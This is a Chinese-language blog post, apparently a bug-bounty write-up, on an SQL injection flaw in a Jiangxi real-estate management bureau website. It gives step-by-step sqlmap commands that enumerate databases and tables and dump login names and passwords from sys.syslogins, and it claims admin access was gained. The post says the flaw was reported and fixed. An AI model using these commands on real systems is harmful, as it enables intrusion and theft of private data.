实战——江西省某房地产管理局存在SQL注入漏洞




已提交SRC


难度 ❤


URL   http://www.*c.cn/info.jsp?id=93


① 

py sqlmap.py -u "http://www.*c.cn/info.jsp?id=93"   可注入,后台为IIS,SQL Server


py sqlmap.py -u "http://www.*.cn/info.jsp?id=93" --dbs  暴库

happysneaker.com


③ 

py sqlmap.py -u "http://www.*c.cn/info.jsp?id=93" --tables  爆表

happysneaker.com

所有数据库以及表都的得到,其中不乏大量政府文件以及管理局、以及交易买卖信息,涉及大量隐私数据、文件。

happysneaker.com

happysneaker.com

happysneaker.com


 py sqlmap.py -u "http://www.*c.cn/info.jsp?id=93" -T "sys.syslogins" --columns

happysneaker.com


py sqlmap.py -u "http://www.*c.cn/info.jsp?id=93" --dump -T "sys.syslogins" -C "loginname,password"

happysneaker.com



所有用户以及管理员用户名密码均可导出还原代码,并可登录后台,进行提权,操作所有数据。




漏洞已修复,文章后发表。


Web安全技术分享
请先登录后发表评论
  • 最新评论
  • 总共0条评论